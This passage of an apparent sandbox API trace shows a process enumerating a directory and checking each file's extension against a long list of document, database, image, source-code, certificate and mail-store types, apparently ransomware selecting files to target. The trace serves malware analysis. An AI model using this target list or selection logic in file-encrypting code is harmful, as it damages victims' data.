-1 [0168.772] lstrlenW (lpString=".dotm") returned 5 [0168.772] lstrcmpiW (lpString1=".dotm", lpString2="a.rtf") returned -1 [0168.772] lstrlenW (lpString=".dotx") returned 5 [0168.772] lstrcmpiW (lpString1=".dotx", lpString2="a.rtf") returned -1 [0168.772] lstrlenW (lpString=".dpx") returned 4 [0168.772] lstrcmpiW (lpString1=".dpx", lpString2=".rtf") returned -1 [0168.772] lstrlenW (lpString=".dqy") returned 4 [0168.772] lstrcmpiW (lpString1=".dqy", lpString2=".rtf") returned -1 [0168.772] lstrlenW (lpString=".dsn") returned 4 [0168.772] lstrcmpiW (lpString1=".dsn", lpString2=".rtf") returned -1 [0168.772] lstrlenW (lpString=".dt") returned 3 [0168.772] lstrcmpiW (lpString1=".dt", lpString2="rtf") returned -1 [0168.772] lstrlenW (lpString=".dtd") returned 4 [0168.772] lstrcmpiW (lpString1=".dtd", lpString2=".rtf") returned -1 [0168.772] lstrlenW (lpString=".dwg") returned 4 [0168.772] lstrcmpiW (lpString1=".dwg", lpString2=".rtf") returned -1 [0168.772] lstrlenW (lpString=".dwt") returned 4 [0168.772] lstrcmpiW (lpString1=".dwt", lpString2=".rtf") returned -1 [0168.772] lstrlenW (lpString=".dx") returned 3 [0168.772] lstrcmpiW (lpString1=".dx", lpString2="rtf") returned -1 [0168.772] lstrlenW (lpString=".dxf") returned 4 [0168.772] lstrcmpiW (lpString1=".dxf", lpString2=".rtf") returned -1 [0168.772] lstrlenW (lpString=".edml") returned 5 [0168.773] lstrcmpiW (lpString1=".edml", lpString2="a.rtf") returned -1 [0168.773] lstrlenW (lpString=".efd") returned 4 [0168.773] lstrcmpiW (lpString1=".efd", lpString2=".rtf") returned -1 [0168.773] lstrlenW (lpString=".elf") returned 4 [0168.773] lstrcmpiW (lpString1=".elf", lpString2=".rtf") returned -1 [0168.773] lstrlenW (lpString=".emf") returned 4 [0168.773] lstrcmpiW (lpString1=".emf", lpString2=".rtf") returned -1 [0168.773] lstrlenW (lpString=".emz") returned 4 [0168.773] lstrcmpiW (lpString1=".emz", lpString2=".rtf") returned -1 [0168.773] lstrlenW (lpString=".epf") returned 4 [0168.773] lstrcmpiW (lpString1=".epf", lpString2=".rtf") returned -1 [0168.773] lstrlenW (lpString=".eps") returned 4 [0168.773] lstrcmpiW (lpString1=".eps", lpString2=".rtf") returned -1 [0168.773] lstrlenW (lpString=".epsf") returned 5 [0168.773] lstrcmpiW (lpString1=".epsf", lpString2="a.rtf") returned -1 [0168.773] lstrlenW (lpString=".epsp") returned 5 [0168.773] lstrcmpiW (lpString1=".epsp", lpString2="a.rtf") returned -1 [0168.773] lstrlenW (lpString=".erf") returned 4 [0168.773] lstrcmpiW (lpString1=".erf", lpString2=".rtf") returned -1 [0168.773] lstrlenW (lpString=".exr") returned 4 [0168.773] lstrcmpiW (lpString1=".exr", lpString2=".rtf") returned -1 [0168.773] lstrlenW (lpString=".f4v") returned 4 [0168.773] lstrcmpiW (lpString1=".f4v", lpString2=".rtf") returned -1 [0168.773] lstrlenW (lpString=".fido") returned 5 [0168.773] lstrcmpiW (lpString1=".fido", lpString2="a.rtf") returned -1 [0168.773] lstrlenW (lpString=".flm") returned 4 [0168.773] lstrcmpiW (lpString1=".flm", lpString2=".rtf") returned -1 [0168.774] lstrlenW (lpString=".flv") returned 4 [0168.774] lstrcmpiW (lpString1=".flv", lpString2=".rtf") returned -1 [0168.774] lstrlenW (lpString=".frm") returned 4 [0168.774] lstrcmpiW (lpString1=".frm", lpString2=".rtf") returned -1 [0168.774] lstrlenW (lpString=".fxg") returned 4 [0168.774] lstrcmpiW (lpString1=".fxg", lpString2=".rtf") returned -1 [0168.774] lstrlenW (lpString=".geo") returned 4 [0168.774] lstrcmpiW (lpString1=".geo", lpString2=".rtf") returned -1 [0168.774] lstrlenW (lpString=".gif") returned 4 [0168.774] lstrcmpiW (lpString1=".gif", lpString2=".rtf") returned -1 [0168.774] lstrlenW (lpString=".grs") returned 4 [0168.774] lstrcmpiW (lpString1=".grs", lpString2=".rtf") returned -1 [0168.774] lstrlenW (lpString=".gz") returned 3 [0168.774] lstrcmpiW (lpString1=".gz", lpString2="rtf") returned -1 [0168.774] lstrlenW (lpString=".h") returned 2 [0168.774] lstrcmpiW (lpString1=".h", lpString2="tf") returned -1 [0168.774] lstrlenW (lpString=".hdr") returned 4 [0168.774] lstrcmpiW (lpString1=".hdr", lpString2=".rtf") returned -1 [0168.774] lstrlenW (lpString=".hpp") returned 4 [0168.774] lstrcmpiW (lpString1=".hpp", lpString2=".rtf") returned -1 [0168.774] lstrlenW (lpString=".hta") returned 4 [0168.774] lstrcmpiW (lpString1=".hta", lpString2=".rtf") returned -1 [0168.774] lstrlenW (lpString=".htc") returned 4 [0168.774] lstrcmpiW (lpString1=".htc", lpString2=".rtf") returned -1 [0168.774] lstrlenW (lpString=".htm") returned 4 [0168.774] lstrcmpiW (lpString1=".htm", lpString2=".rtf") returned -1 [0168.774] lstrlenW (lpString=".html") returned 5 [0168.774] lstrcmpiW (lpString1=".html", lpString2="a.rtf") returned -1 [0168.775] lstrlenW (lpString=".icb") returned 4 [0168.775] lstrcmpiW (lpString1=".icb", lpString2=".rtf") returned -1 [0168.775] lstrlenW (lpString=".ics") returned 4 [0168.775] lstrcmpiW (lpString1=".ics", lpString2=".rtf") returned -1 [0168.775] lstrlenW (lpString=".iff") returned 4 [0168.775] lstrcmpiW (lpString1=".iff", lpString2=".rtf") returned -1 [0168.775] lstrlenW (lpString=".inc") returned 4 [0168.775] lstrcmpiW (lpString1=".inc", lpString2=".rtf") returned -1 [0168.775] lstrlenW (lpString=".indd") returned 5 [0168.775] lstrcmpiW (lpString1=".indd", lpString2="a.rtf") returned -1 [0168.775] lstrlenW (lpString=".ini") returned 4 [0168.775] lstrcmpiW (lpString1=".ini", lpString2=".rtf") returned -1 [0168.775] lstrlenW (lpString=".iqy") returned 4 [0168.775] lstrcmpiW (lpString1=".iqy", lpString2=".rtf") returned -1 [0168.775] lstrlenW (lpString=".j2c") returned 4 [0168.775] lstrcmpiW (lpString1=".j2c", lpString2=".rtf") returned -1 [0168.775] lstrlenW (lpString=".j2k") returned 4 [0168.775] lstrcmpiW (lpString1=".j2k", lpString2=".rtf") returned -1 [0168.775] lstrlenW (lpString=".java") returned 5 [0168.775] lstrcmpiW (lpString1=".java", lpString2="a.rtf") returned -1 [0168.775] lstrlenW (lpString=".jp2") returned 4 [0168.775] lstrcmpiW (lpString1=".jp2", lpString2=".rtf") returned -1 [0168.776] lstrlenW (lpString=".jpc") returned 4 [0168.776] lstrcmpiW (lpString1=".jpc", lpString2=".rtf") returned -1 [0168.776] lstrlenW (lpString=".jpe") returned 4 [0168.776] lstrcmpiW (lpString1=".jpe", lpString2=".rtf") returned -1 [0168.776] lstrlenW (lpString=".jpeg") returned 5 [0168.776] lstrcmpiW (lpString1=".jpeg", lpString2="a.rtf") returned -1 [0168.776] lstrlenW (lpString=".jpf") returned 4 [0168.776] lstrcmpiW (lpString1=".jpf", lpString2=".rtf") returned -1 [0168.776] lstrlenW (lpString=".jpg") returned 4 [0168.776] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0168.776] lstrlenW (lpString=".jpx") returned 4 [0168.776] lstrcmpiW (lpString1=".jpx", lpString2=".rtf") returned -1 [0168.776] lstrlenW (lpString=".js") returned 3 [0168.776] lstrcmpiW (lpString1=".js", lpString2="rtf") returned -1 [0168.776] lstrlenW (lpString=".jsf") returned 4 [0168.776] lstrcmpiW (lpString1=".jsf", lpString2=".rtf") returned -1 [0168.776] lstrlenW (lpString=".json") returned 5 [0168.776] lstrcmpiW (lpString1=".json", lpString2="a.rtf") returned -1 [0168.776] lstrlenW (lpString=".jsp") returned 4 [0168.776] lstrcmpiW (lpString1=".jsp", lpString2=".rtf") returned -1 [0168.776] lstrlenW (lpString=".kdc") returned 4 [0168.776] lstrcmpiW (lpString1=".kdc", lpString2=".rtf") returned -1 [0168.776] lstrlenW (lpString=".kmz") returned 4 [0168.776] lstrcmpiW (lpString1=".kmz", lpString2=".rtf") returned -1 [0168.776] lstrlenW (lpString=".kwm") returned 4 [0168.776] lstrcmpiW (lpString1=".kwm", lpString2=".rtf") returned -1 [0168.776] lstrlenW (lpString=".lasso") returned 6 [0168.777] lstrcmpiW (lpString1=".lasso", lpString2="la.rtf") returned -1 [0168.777] lstrlenW (lpString=".lbi") returned 4 [0168.777] lstrcmpiW (lpString1=".lbi", lpString2=".rtf") returned -1 [0168.777] lstrlenW (lpString=".lgf") returned 4 [0168.777] lstrcmpiW (lpString1=".lgf", lpString2=".rtf") returned -1 [0168.777] lstrlenW (lpString=".lgp") returned 4 [0168.777] lstrcmpiW (lpString1=".lgp", lpString2=".rtf") returned -1 [0168.777] lstrlenW (lpString=".log") returned 4 [0168.777] lstrcmpiW (lpString1=".log", lpString2=".rtf") returned -1 [0168.777] lstrlenW (lpString=".m1v") returned 4 [0168.777] lstrcmpiW (lpString1=".m1v", lpString2=".rtf") returned -1 [0168.777] lstrlenW (lpString=".m4a") returned 4 [0168.777] lstrcmpiW (lpString1=".m4a", lpString2=".rtf") returned -1 [0168.777] lstrlenW (lpString=".m4v") returned 4 [0168.777] lstrcmpiW (lpString1=".m4v", lpString2=".rtf") returned -1 [0168.777] lstrlenW (lpString=".max") returned 4 [0168.777] lstrcmpiW (lpString1=".max", lpString2=".rtf") returned -1 [0168.777] lstrlenW (lpString=".md") returned 3 [0168.777] lstrcmpiW (lpString1=".md", lpString2="rtf") returned -1 [0168.777] lstrlenW (lpString=".mda") returned 4 [0168.777] lstrcmpiW (lpString1=".mda", lpString2=".rtf") returned -1 [0168.777] lstrlenW (lpString=".mdb") returned 4 [0168.777] lstrcmpiW (lpString1=".mdb", lpString2=".rtf") returned -1 [0168.777] lstrlenW (lpString=".mde") returned 4 [0168.777] lstrcmpiW (lpString1=".mde", lpString2=".rtf") returned -1 [0168.777] lstrlenW (lpString=".mdf") returned 4 [0168.777] lstrcmpiW (lpString1=".mdf", lpString2=".rtf") returned -1 [0168.777] lstrlenW (lpString=".mdw") returned 4 [0168.778] lstrcmpiW (lpString1=".mdw", lpString2=".rtf") returned -1 [0168.778] lstrlenW (lpString=".mef") returned 4 [0168.778] lstrcmpiW (lpString1=".mef", lpString2=".rtf") returned -1 [0168.778] lstrlenW (lpString=".mft") returned 4 [0168.778] lstrcmpiW (lpString1=".mft", lpString2=".rtf") returned -1 [0168.778] lstrlenW (lpString=".mfw") returned 4 [0168.778] lstrcmpiW (lpString1=".mfw", lpString2=".rtf") returned -1 [0168.778] lstrlenW (lpString=".mht") returned 4 [0168.778] lstrcmpiW (lpString1=".mht", lpString2=".rtf") returned -1 [0168.778] lstrlenW (lpString=".mhtml") returned 6 [0168.778] lstrcmpiW (lpString1=".mhtml", lpString2="la.rtf") returned -1 [0168.778] lstrlenW (lpString=".mka") returned 4 [0168.778] lstrcmpiW (lpString1=".mka", lpString2=".rtf") returned -1 [0168.778] lstrlenW (lpString=".mkidx") returned 6 [0168.778] lstrcmpiW (lpString1=".mkidx", lpString2="la.rtf") returned -1 [0168.778] lstrlenW (lpString=".mkv") returned 4 [0168.778] lstrcmpiW (lpString1=".mkv", lpString2=".rtf") returned -1 [0168.778] lstrlenW (lpString=".mos") returned 4 [0168.778] lstrcmpiW (lpString1=".mos", lpString2=".rtf") returned -1 [0168.778] lstrlenW (lpString=".mov") returned 4 [0168.778] lstrcmpiW (lpString1=".mov", lpString2=".rtf") returned -1 [0168.778] lstrlenW (lpString=".mp3") returned 4 [0168.778] lstrcmpiW (lpString1=".mp3", lpString2=".rtf") returned -1 [0168.778] lstrlenW (lpString=".mp4") returned 4 [0168.778] lstrcmpiW (lpString1=".mp4", lpString2=".rtf") returned -1 [0168.778] lstrlenW (lpString=".mpeg") returned 5 [0168.778] lstrcmpiW (lpString1=".mpeg", lpString2="a.rtf") returned -1 [0168.778] lstrlenW (lpString=".mpg") returned 4 [0168.779] lstrcmpiW (lpString1=".mpg", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".mpv") returned 4 [0168.779] lstrcmpiW (lpString1=".mpv", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".mrw") returned 4 [0168.779] lstrcmpiW (lpString1=".mrw", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".msg") returned 4 [0168.779] lstrcmpiW (lpString1=".msg", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".mxl") returned 4 [0168.779] lstrcmpiW (lpString1=".mxl", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".myd") returned 4 [0168.779] lstrcmpiW (lpString1=".myd", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".myi") returned 4 [0168.779] lstrcmpiW (lpString1=".myi", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".nef") returned 4 [0168.779] lstrcmpiW (lpString1=".nef", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".nrw") returned 4 [0168.779] lstrcmpiW (lpString1=".nrw", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".obj") returned 4 [0168.779] lstrcmpiW (lpString1=".obj", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".odb") returned 4 [0168.779] lstrcmpiW (lpString1=".odb", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".odc") returned 4 [0168.779] lstrcmpiW (lpString1=".odc", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".odm") returned 4 [0168.779] lstrcmpiW (lpString1=".odm", lpString2=".rtf") returned -1 [0168.779] lstrlenW (lpString=".odp") returned 4 [0168.779] lstrcmpiW (lpString1=".odp", lpString2=".rtf") returned -1 [0168.780] lstrlenW (lpString=".ods") returned 4 [0168.780] lstrcmpiW (lpString1=".ods", lpString2=".rtf") returned -1 [0168.780] lstrlenW (lpString=".oft") returned 4 [0168.780] lstrcmpiW (lpString1=".oft", lpString2=".rtf") returned -1 [0168.780] lstrlenW (lpString=".one") returned 4 [0168.780] lstrcmpiW (lpString1=".one", lpString2=".rtf") returned -1 [0168.780] lstrlenW (lpString=".onepkg") returned 7 [0168.780] lstrcmpiW (lpString1=".onepkg", lpString2="ula.rtf") returned -1 [0168.780] lstrlenW (lpString=".onetoc2") returned 8 [0168.780] lstrcmpiW (lpString1=".onetoc2", lpString2="eula.rtf") returned -1 [0168.780] lstrlenW (lpString=".opt") returned 4 [0168.780] lstrcmpiW (lpString1=".opt", lpString2=".rtf") returned -1 [0168.780] lstrlenW (lpString=".oqy") returned 4 [0168.780] lstrcmpiW (lpString1=".oqy", lpString2=".rtf") returned -1 [0168.780] lstrlenW (lpString=".orf") returned 4 [0168.780] lstrcmpiW (lpString1=".orf", lpString2=".rtf") returned -1 [0168.780] lstrlenW (lpString=".p12") returned 4 [0168.780] lstrcmpiW (lpString1=".p12", lpString2=".rtf") returned -1 [0168.780] lstrlenW (lpString=".p7b") returned 4 [0168.780] lstrcmpiW (lpString1=".p7b", lpString2=".rtf") returned -1 [0168.780] lstrlenW (lpString=".p7c") returned 4 [0168.780] lstrcmpiW (lpString1=".p7c", lpString2=".rtf") returned -1 [0168.780] lstrlenW (lpString=".pam") returned 4 [0168.780] lstrcmpiW (lpString1=".pam", lpString2=".rtf") returned -1 [0168.780] lstrlenW (lpString=".pbm") returned 4 [0168.780] lstrcmpiW (lpString1=".pbm", lpString2=".rtf") returned -1 [0168.780] lstrlenW (lpString=".pct") returned 4 [0168.780] lstrcmpiW (lpString1=".pct", lpString2=".rtf") returned -1 [0168.781] lstrlenW (lpString=".pcx") returned 4 [0168.781] lstrcmpiW (lpString1=".pcx", lpString2=".rtf") returned -1 [0168.781] lstrlenW (lpString=".pdd") returned 4 [0168.781] lstrcmpiW (lpString1=".pdd", lpString2=".rtf") returned -1 [0168.781] lstrlenW (lpString=".pdf") returned 4 [0168.781] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0168.781] lstrlenW (lpString=".pdp") returned 4 [0168.781] lstrcmpiW (lpString1=".pdp", lpString2=".rtf") returned -1 [0168.781] lstrlenW (lpString=".pef") returned 4 [0168.781] lstrcmpiW (lpString1=".pef", lpString2=".rtf") returned -1 [0168.781] lstrlenW (lpString=".pem") returned 4 [0168.781] lstrcmpiW (lpString1=".pem", lpString2=".rtf") returned -1 [0168.781] lstrlenW (lpString=".pff") returned 4 [0168.781] lstrcmpiW (lpString1=".pff", lpString2=".rtf") returned -1 [0168.781] lstrlenW (lpString=".pfm") returned 4 [0168.781] lstrcmpiW (lpString1=".pfm", lpString2=".rtf") returned -1 [0168.781] lstrlenW (lpString=".pfx") returned 4 [0168.781] lstrcmpiW (lpString1=".pfx", lpString2=".rtf") returned -1 [0168.781] lstrlenW (lpString=".pgm") returned 4 [0168.781] lstrcmpiW (lpString1=".pgm", lpString2=".rtf") returned -1 [0168.781] lstrlenW (lpString=".php") returned 4 [0168.781] lstrcmpiW (lpString1=".php", lpString2=".rtf") returned -1 [0168.781] lstrlenW (lpString=".php3") returned 5 [0168.781] lstrcmpiW (lpString1=".php3", lpString2="a.rtf") returned -1 [0168.781] lstrlenW (lpString=".php4") returned 5 [0168.781] lstrcmpiW (lpString1=".php4", lpString2="a.rtf") returned -1 [0168.781] lstrlenW (lpString=".php5") returned 5 [0168.782] lstrcmpiW (lpString1=".php5", lpString2="a.rtf") returned -1 [0168.782] lstrlenW (lpString=".phtml") returned 6 [0168.782] lstrcmpiW (lpString1=".phtml", lpString2="la.rtf") returned -1 [0168.782] lstrlenW (lpString=".pict") returned 5 [0168.782] lstrcmpiW (lpString1=".pict", lpString2="a.rtf") returned -1 [0168.782] lstrlenW (lpString=".pl") returned 3 [0168.782] lstrcmpiW (lpString1=".pl", lpString2="rtf") returned -1 [0168.782] lstrlenW (lpString=".pls") returned 4 [0168.782] lstrcmpiW (lpString1=".pls", lpString2=".rtf") returned -1 [0168.782] lstrlenW (lpString=".pm") returned 3 [0168.782] lstrcmpiW (lpString1=".pm", lpString2="rtf") returned -1 [0168.782] lstrlenW (lpString=".png") returned 4 [0168.782] lstrcmpiW (lpString1=".png", lpString2=".rtf") returned -1 [0168.782] lstrlenW (lpString=".pnm") returned 4 [0168.782] lstrcmpiW (lpString1=".pnm", lpString2=".rtf") returned -1 [0168.782] lstrlenW (lpString=".pot") returned 4 [0168.782] lstrcmpiW (lpString1=".pot", lpString2=".rtf") returned -1 [0168.782] lstrlenW (lpString=".potm") returned 5 [0168.782] lstrcmpiW (lpString1=".potm", lpString2="a.rtf") returned -1 [0168.782] lstrlenW (lpString=".potx") returned 5 [0168.782] lstrcmpiW (lpString1=".potx", lpString2="a.rtf") returned -1 [0168.782] lstrlenW (lpString=".ppa") returned 4 [0168.782] lstrcmpiW (lpString1=".ppa", lpString2=".rtf") returned -1 [0168.782] lstrlenW (lpString=".ppam") returned 5 [0168.782] lstrcmpiW (lpString1=".ppam", lpString2="a.rtf") returned -1 [0168.782] lstrlenW (lpString=".ppm") returned 4 [0168.782] lstrcmpiW (lpString1=".ppm", lpString2=".rtf") returned -1 [0168.782] lstrlenW (lpString=".pps") returned 4 [0168.783] lstrcmpiW (lpString1=".pps", lpString2=".rtf") returned -1 [0168.783] lstrlenW (lpString=".ppsm") returned 5 [0168.783] lstrcmpiW (lpString1=".ppsm", lpString2="a.rtf") returned -1 [0168.783] lstrlenW (lpString=".ppt") returned 4 [0168.783] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0168.783] lstrlenW (lpString=".pptm") returned 5 [0168.783] lstrcmpiW (lpString1=".pptm", lpString2="a.rtf") returned -1 [0168.783] lstrlenW (lpString=".pptx") returned 5 [0168.783] lstrcmpiW (lpString1=".pptx", lpString2="a.rtf") returned -1 [0168.783] lstrlenW (lpString=".prn") returned 4 [0168.783] lstrcmpiW (lpString1=".prn", lpString2=".rtf") returned -1 [0168.783] lstrlenW (lpString=".ps") returned 3 [0168.783] lstrcmpiW (lpString1=".ps", lpString2="rtf") returned -1 [0168.783] lstrlenW (lpString=".psb") returned 4 [0168.783] lstrcmpiW (lpString1=".psb", lpString2=".rtf") returned -1 [0168.783] lstrlenW (lpString=".psd") returned 4 [0168.783] lstrcmpiW (lpString1=".psd", lpString2=".rtf") returned -1 [0168.783] lstrlenW (lpString=".pst") returned 4 [0168.783] lstrcmpiW (lpString1=".pst", lpString2=".rtf") returned -1 [0168.783] lstrlenW (lpString=".ptx") returned 4 [0168.783] lstrcmpiW (lpString1=".ptx", lpString2=".rtf") returned -1 [0168.783] lstrlenW (lpString=".pub") returned 4 [0168.783] lstrcmpiW (lpString1=".pub", lpString2=".rtf") returned -1 [0168.783] lstrlenW (lpString=".pwm") returned 4 [0168.783] lstrcmpiW (lpString1=".pwm", lpString2=".rtf") returned -1 [0168.783] lstrlenW (lpString=".pxr") returned 4 [0168.783] lstrcmpiW (lpString1=".pxr", lpString2=".rtf") returned -1 [0168.783] lstrlenW (lpString=".py") returned 3 [0168.784] lstrcmpiW (lpString1=".py", lpString2="rtf") returned -1 [0168.784] lstrlenW (lpString=".qt") returned 3 [0168.784] lstrcmpiW (lpString1=".qt", lpString2="rtf") returned -1 [0168.784] lstrlenW (lpString=".r3d") returned 4 [0168.784] lstrcmpiW (lpString1=".r3d", lpString2=".rtf") returned -1 [0168.784] lstrlenW (lpString=".raf") returned 4 [0168.784] lstrcmpiW (lpString1=".raf", lpString2=".rtf") returned -1 [0168.784] lstrlenW (lpString=".rar") returned 4 [0168.784] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0168.784] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0168.784] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0168.784] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0168.784] FindClose (in: hFindFile=0x802118 | out: hFindFile=0x802118) returned 1 [0168.785] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0168.785] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1031", cAlternateFileName="")) returned 1 [0168.785] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0168.785] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031") returned 26 [0168.785] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8021d8 [0168.790] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.790] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0168.790] lstrlenW (lpString="eula.rtf") returned 8 [0168.790] lstrlenW (lpString=".1cd") returned 4 [0168.790] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0168.790] lstrlenW (lpString=".3ds") returned 4 [0168.790] lstrcmpiW (lpString1=".3ds", lpString2=".rtf") returned -1 [0168.808] lstrlenW (lpString=".3fr") returned 4 [0168.808] lstrcmpiW (lpString1=".3fr", lpString2=".rtf") returned -1 [0168.808] lstrlenW (lpString=".3g2") returned 4 [0168.808] lstrcmpiW (lpString1=".3g2", lpString2=".rtf") returned -1 [0168.808] lstrlenW (lpString=".3gp") returned 4 [0168.808] lstrcmpiW (lpString1=".3gp", lpString2=".rtf") returned -1 [0168.808] lstrlenW (lpString=".7z") returned 3 [0168.808] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0168.808] lstrlenW (lpString=".accda") returned 6 [0168.808] lstrcmpiW (lpString1=".accda", lpString2="la.rtf") returned -1 [0168.808] lstrlenW (lpString=".accdb") returned 6 [0168.808] lstrcmpiW (lpString1=".accdb", lpString2="la.rtf") returned -1 [0168.811] lstrlenW (lpString=".accdc") returned 6 [0168.811] lstrcmpiW (lpString1=".accdc", lpString2="la.rtf") returned -1 [0168.811] lstrlenW (lpString=".accde") returned 6 [0168.811] lstrcmpiW (lpString1=".accde", lpString2="la.rtf") returned -1 [0168.811] lstrlenW (lpString=".accdt") returned 6 [0168.811] lstrcmpiW (lpString1=".accdt", lpString2="la.rtf") returned -1 [0168.822] lstrlenW (lpString=".accdw") returned 6 [0168.822] lstrcmpiW (lpString1=".accdw", lpString2="la.rtf") returned -1 [0168.822] lstrlenW (lpString=".adb") returned 4 [0168.822] lstrcmpiW (lpString1=".adb", lpString2=".rtf") returned -1 [0168.822] lstrlenW (lpString=".adp") returned 4 [0168.822] lstrcmpiW (lpString1=".adp", lpString2=".rtf") returned -1 [0168.822] lstrlenW (lpString=".ai") returned 3 [0168.822] lstrcmpiW (lpString1=".ai", lpString2="rtf") returned -1 [0168.823] lstrlenW (lpString=".ai3") returned 4 [0168.823] lstrcmpiW (lpString1=".ai3", lpString2=".rtf") returned -1 [0168.823] lstrlenW (lpString=".ai4") returned 4 [0168.823] lstrcmpiW (lpString1=".ai4", lpString2=".rtf") returned -1 [0168.823] lstrlenW (lpString=".ai5") returned 4 [0168.823] lstrcmpiW (lpString1=".ai5", lpString2=".rtf") returned -1 [0168.823] lstrlenW (lpString=".ai6") returned 4 [0168.823] lstrcmpiW (lpString1=".ai6", lpString2=".rtf") returned -1 [0168.823] lstrlenW (lpString=".ai7") returned 4 [0168.823] lstrcmpiW (lpString1=".ai7", lpString2=".rtf") returned -1 [0168.823] lstrlenW (lpString=".ai8") returned 4 [0168.823] lstrcmpiW (lpString1=".ai8", lpString2=".rtf") returned -1 [0168.823] lstrlenW (lpString=".anim") returned 5 [0168.823] lstrcmpiW (lpString1=".anim", lpString2="a.rtf") returned -1 [0168.823] lstrlenW (lpString=".arw") returned 4 [0168.823] lstrcmpiW (lpString1=".arw", lpString2=".rtf") returned -1 [0168.823] lstrlenW (lpString=".as") returned 3 [0168.824] lstrcmpiW (lpString1=".as", lpString2="rtf") returned -1 [0168.824] lstrlenW (lpString=".asa") returned 4 